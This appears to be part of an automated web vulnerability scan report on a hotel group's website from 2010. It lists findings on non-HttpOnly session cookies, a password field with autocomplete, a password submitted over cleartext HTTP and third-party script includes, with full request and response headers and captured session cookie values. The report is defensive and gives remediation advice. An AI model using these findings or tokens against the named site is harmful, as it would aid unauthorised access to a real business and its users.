<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Destination News - London, Flor
...[SNIP]...
2.23. http://www.redcarnationhotels.com/refer-a-friend  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /refer-a-friend

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /refer-a-friend HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:23 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=b215cb8e38815bbbb9fba59d31514955; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Send to a Friend</title>
<met
...[SNIP]...
2.24. http://www.redcarnationhotels.com/search  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:17 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=94bca35a4d7c66899e27a596387efe0d; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Search - Red Carnation Hotels</
...[SNIP]...
2.25. http://www.redcarnationhotels.com/site-map  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /site-map

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site-map HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:31 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bc0e91c340b0c8c5f0de0f9133eec66b; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Site Map</title>
<meta http-equ
...[SNIP]...
2.26. http://www.redcarnationhotels.com/special-occasions  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /special-occasions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /special-occasions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=064d44ec42ae0320af68f09cef0becea; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Weddings, Honeymoons, Christmas
...[SNIP]...
2.27. http://www.redcarnationhotels.com/travel-agents  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel-agents HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:25:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:25:05 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8ed7ac330ba840ea6828a58e485783b4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
2.28. http://www.redcarnationhotels.com/useful-links  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /useful-links

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /useful-links HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=fa8e88b1ec9853100dafa585ebdfc757; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Links - Red Carnation Ho
...[SNIP]...
2.29. http://www.redcarnationhotels.com/wellness  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /wellness

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wellness HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8103ef1c266dc5bf10402082bca4acc4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Spa Hotels, UK, London,
...[SNIP]...
2.30. http://www.redcarnationhotels.com/your-stay  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /your-stay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /your-stay HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:02 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a046d59539af2a88b9e0057f3dbee706; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /travel-agents HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:25:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:25:05 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8ed7ac330ba840ea6828a58e485783b4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
<br />
   
           <form class="frm" id="travel_agent_form" action="" method="post" enctype="multipart/form-data" >
           <fieldset>
...[SNIP]...
</label>
                   <input type="password" name="travel_agent_iata" id="travel_agent_iata" value="" />
               </div>
...[SNIP]...
4. Cleartext submission of password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /travel-agents HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:25:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:25:05 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8ed7ac330ba840ea6828a58e485783b4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
<br />
   
           <form class="frm" id="travel_agent_form" action="" method="post" enctype="multipart/form-data" >
           <fieldset>
...[SNIP]...
</label>
                   <input type="password" name="travel_agent_iata" id="travel_agent_iata" value="" />
               </div>
...[SNIP]...
5. Cross-domain script include  previous  next
There are 104 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.redcarnationhotels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.milestonehotel.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:20:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:20:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05996081970c883254084bbef9c977de; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotels, 5 Star Hotels, B
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.2. http://www.redcarnationhotels.com/african-pride  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /african-pride

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /african-pride HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:46 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>African Pride VIP Treatment -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.3. http://www.redcarnationhotels.com/african-pride/terms-and-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /african-pride/terms-and-conditions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /african-pride/terms-and-conditions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.4. http://www.redcarnationhotels.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05f8c07acc9a296160e78cdf96650b67; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Hotel & Hospitality Careers - L
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.5. http://www.redcarnationhotels.com/careers/awards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/awards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/awards HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:28 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Awards and Accolades - Red Carn
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.6. http://www.redcarnationhotels.com/careers/fraudulent-emails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/fraudulent-emails

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/fraudulent-emails HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Please be aware of fraudulent e
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.7. http://www.redcarnationhotels.com/careers/hr-podcast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/hr-podcast

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/hr-podcast HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:22 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>HR Podcasts</title>
<meta http-
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
